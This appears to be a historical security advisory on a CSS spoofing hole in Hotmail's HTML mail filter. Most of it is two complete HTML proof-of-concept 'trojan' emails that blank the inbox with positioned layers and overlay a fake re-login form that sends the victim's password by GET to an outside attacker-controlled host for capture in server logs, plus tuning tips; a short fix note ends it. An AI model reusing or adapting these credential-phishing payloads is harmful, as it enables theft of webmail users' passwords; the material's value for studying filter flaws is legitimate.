COMMAND
Hotmail
SYSTEMS AFFECTED
Hotmail
PROBLEM
Gregory Duchemin found following. In his advisory, Ben Li spoke
about a bug in most of next generation browsers that deal with
css and a broken image that leads to a general html links
corruption:
http://oliver.efri.hr/~crv/security/bugs/Others/webmail4.html
A similar problem exist with css used inside a web base mail
server with this time a plain image but no link needed. It's
possible to generate some mail trojans that will recover user
personal information like passwords. It's no longer a bug in the
browsers, but in the implementation of servers html filters.
Gregory did some test with Hotmail and MsIe 4/5 (NT) and it work
really fine. In fact we have here a very serious hole.
It was possible (at least with Hotmail) to use a background layer
with a full blank picture to erase all the browser screen (Hotmail
desktop) and by using another top layer with a slightly modified
password requester it would be easy to fool most people around
here.
A simple 'img href' to an outside 1x1 white pixel picture expanded
to 1280x768 is ok for the background layer and will clean
everything.
Since the new frame appear over the first one and not in a new
window like in the usual way, the Microsoft top frame warning that
user is going outside hotmail will no longer exist.
So, from the user side, just after clicking on his mail to read
it, the screen will show him what he would trust to be the
hotmail relogin page. The URL inside the browser is still Hotmail
so he has no really obvious reason to worry except if he took the
same login page 2 minutes just before.
The relogin page, embedded in the mail inside the top layer, won't
be really the same as the original one, the form field may be
changed with an unsecure http connection and a GET method while
pointing to the attacker web server. Then, the password in his
web server logs, the attacker may finaly redirect the victim to
the real page.
Below, "only some skulls" of a mail exploit: copyrighted material
was needed.
<div align="left">
<div id="layer1" style="width:99px; height:99px; position:absolute;
left:0px; top:0px; z-index:0;">
<!-- First Layer, a big blank screen to hide Hotmail desk -->
<div id="layer2" style="position:absolute; left:140; top:100; z-index:0;">
<!-- Layer 2, will show up text, pics, form -->
<!-- Here the new hotmail login.html that point to our web server
Need Microsoft login page with all copyrighted
logos, banners ... -->
</div>
</div>
Gregory Duchemin sent following as the proof of concept for css
hotmail spoofing/ password recovery. To use it, just mail it to
yourself not others. All graphics were made by the author to
explicitly show it is not the real hotmail relogin page and thus
preventing any abuse and copyright violation. This did work fine
with MSIE, would need some little changes to work on Netscape.
Note that we have here 2 versions.
<html>
<!-- H0RSEM4IL.c0m , trojanized mail to catch users password.
A proof of concept for most of web based mailer.
Tested on Hotmail with msie.
To try it, just mail this page to an hotmail mailbox but remember
This page is for educational purposes ONLY !
-->
<body>
<div align="left">
<div id="layer1" style="width:1280px; height:768px; position:absolute; left:0px; top:0px; z-index:0;">
<!-- First Layer, a big blank screen to hide Hotmail desk -->
<div id="layer2" style="position:absolute; left:40; top:100; z-index:0;">
<!-- Layer 2, will show up the near to original hotmail re-enter
password screen ;) -->
<!-- Here we have slightly modified the orignal hotmail login.html to point
on our own site with GET method to catch password in our logs -->
<form name="passwordform" target="layer2" action="http://c3rber.multimania.com/merci.txt" method="GET" target="_top" AUTOCOMPLETE="OFF" >
<table cellpadding=0 cellspacing=0 border=0 width=590>
<tr>
<td colspan=2>
<table cellpadding=0 cellspacing=0 border=0 width="100%"><tr><td>
<a href="javascript:void()" target="_top"><img src="http://c3rber.multimania.com/horsemail.gif" width=468 height=60 border=0 alt=""></a>
</td>
<td align="CENTER" nowrap>
<img src="http://c3rber.multimania.com/pass.gif" width=140 height=44 border=0 alt="Find Out More About Passport"><br>
<a href="javascript:void()" target="_top"><font class="f" size=2>Help</font></a><br>
</td></tr></table>
</td>
</tr><tr>
<td bgcolor="#cccc99"><font class="f" size=4><b>Please re-enter your password at your own risk</b></font></td>
<td valign="top"><table width="100%" border=0 cellspacing=0 cellpadding=0><tr><td height=1 bgcolor="#cccc99"></td></tr></table></td>
</tr>
<tr><td height="6"></td></tr>
<tr valign="top">
<td><font class="s">
</font>
</td>
<td rowspan=4><font class="s">
</font>
</font>
</td>
</tr>
<tr>
<td>
<font class="f" size=2><b><victim@hotmail.com></b></font>
<input type="hidden" name="domain" value="hotmail.com">
<table cellpadding=0 cellspacing=0>
<tr>
<td height=35 valign="middle"><font class="sbd">Password</font> </td>
<td><input type="password" name="passwd" size="16" maxlength="16"></td>
<td width=22 valign="middle" align="center"> </td>
<td><input type="submit" name="enter" value="Sign in"></td>
</tr>
<tr>
<td></td>
<td colspan="2"><font class="f" size=2><b><a href="javascript:void()" target="_top">Change
User</a></b></font></td>
</tr>
</table>
</form>
</table>
<table cellpadding=0 cellspacing=0 border=0 width=590>
<tr>
<td>
<font class="s">Fake © 2001 P0w3rsoft Corporation. All rights not reserved.</font>
<a href="javascript:void()">H0rsemail TERMS OF USE and NOTICES</font></a>
<a href="javascript:void()"><font class="s">untrusted Privacy Statement</font></a>
</td>
</tr>
</table>
</div>
<p align="center">
<img src="http://c3rber.multimania.com/hotmail.jpg" width="1280" height="950" border="0" >
</div>
</div>
</body>
<--
Gregory Duchemin - Security Consultant -
NEUROCOM CANADA
1001 bd Maisonneuve Ouest - suite 200
H3A 3C8 Montreal - Quebec - CANADA
c3rb3r@hotmail.com
Original idea : Ben Li <bali@THOCK.COM>
-->
</html>
Above exploit is broken with MSIE 5.50, in fact the background
image won't appear at all, anyway it was a bad idea to use it.
Below is a new version that will work with msie 4/5/5.50, the
background color is now fixed as a blank value (#ffffff) into the
div class (thus deleting one useless connection).
The mail folders navigator input form that buggily appeared on the
top layer was fix too by playing with its porperties (select{
visibility:hidden}). The scrollbar at the bottom was reduced with
the help of the class width parameter. You will have to choose it
accordingly to the screen res of the trojan receiver, if You don't
know, just take a big value.
But this exploit isn't absolutely perfect, we have still this
advertising iframe at the top middle and since we can't use
javascript to modify its properties. This iframe tag is really
interesting but already filtered by hotmail and yahoo, may be in
some cross-vulnerable sites list that was diffused here some weeks
ago.
NOTE: To work properly, the message MUST BEGIN with the html tag
(nothing above). Don't use it for any malicious activity:
<html>
<div align="left">
<style type="text/css">
<!--
div.trojan {
background-color: #ffffff;
background-repeat: repeat;
position: absolute;
width: 850px;
height: 950px;
top: 0px;
left: 0px;
visibility: visible;
z-index: 0;
font-family: times;
font-size: 72px;
}
-->
</style>
<div id="layer1" class="trojan">
<div id="layer2" class="trojan" style="left:80px;top:100px;
">
<form name="passwordform" target="_blank" action="http://c3rber.multimania.com/merci.txt" method="GET" target="_blank" AUTOCOMPLETE="OFF" >
<table cellpadding=0 cellspacing=0 border=0 width=590>
<tr>
<td colspan=2>
<table cellpadding=0 cellspacing=0 border=0 width="100%"><tr><td>
<a href="#" ><img src="http://c3rber.multimania.com/horsemail.gif" width=468 height=60 border=0 alt=""></a>
</td>
<td align="CENTER" nowrap>
<img src="http://c3rber.multimania.com/pass.gif" width=140 height=44 border=0 alt="Find Out More About Passport"><br>
<a href="#" ><font class="f" size=2>Help</font></a><br>
</td></tr></table>
</td>
</tr><tr>
<td bgcolor="#cccc99"><font class="f" size=4><b>Please re-enter your password at your own risk</b></font></td>
<td valign="top"><table width="100%" border=0 cellspacing=0 cellpadding=0><tr><td height=1 bgcolor="#cccc99"></td></tr></table></td>
</tr>
<tr><td height="6"></td></tr>
<tr valign="top">
<td><font class="s">
</font>
</td>
<td rowspan=4><font class="s">
</font>
</font>
</td>
</tr>
<tr>
<td>
<font class="f" size=2><b><victim@hotmail.com></b></font>
<table cellpadding=0 cellspacing=0>
<tr>
<td height=35 valign="middle"><font class="sbd">Password</font> </td>
<td><input type="password" name="passwd" size="16" maxlength="16"></td>
<td width=22 valign="middle" align="center"> </td>
<td><input type="submit" name="enter" value="Sign in"></td>
</tr>
<tr>
<td></td>
<td colspan="2"><font class="f" size=2><b><a href="#" >Change
User</a></b></font></td>
</tr>
</table>
</form>
</table>
<table cellpadding=0 cellspacing=0 border=0 width=590>
<tr>
<td>
<font class="s">Hotmail © Cross-scripting/css 2001 Proof of concept. C3rb3r (January 2001).</font>
<a href="javascript:Filtered()" target="_blank">H0rsemail TERMS OF USE and NOTICES</font></a>
<a href="javascript:Filtered()" target="_blank"><font class="s">untrusted Privacy Statement</font></a>
</td>
</tr>
</table>
</div>
<p align="center">
</div>
</div>
<style type="css/text">
<!--
input { visibility: hidden }
select { visibility: hidden; color: #ffffff }
option { visibility: hidden; color: #ffffff }
iframe { visibility: hidden; color: #ffffff }
div {
background-color: #ffffff;
background-repeat: repeat;
position: absolute;
width: 0px;
height: 0px;
top: 0px;
left: 0px;
visibility: hidden;
z-index: 1;
font-family: times;
font-size: 72px;
}
-->
</style>
<!--
Gregory Duchemin - Security Consultant -
NEUROCOM CANADA
1001 bd Maisonneuve Ouest - suite 200
H3A 3C8 Montreal - Quebec - CANADA
c3rb3r@hotmail.com
Just a proof of concept, don't use it for illegal purposes
Original idea : Ben Li <bali@THOCK.COM>
-->
<div id="trash">
<!--
SOLUTION
Hotmail has fixed the "css hotmail spoofing/ password recovery"
bug. Hotmail will replace "positon: absolue" by "position:
static".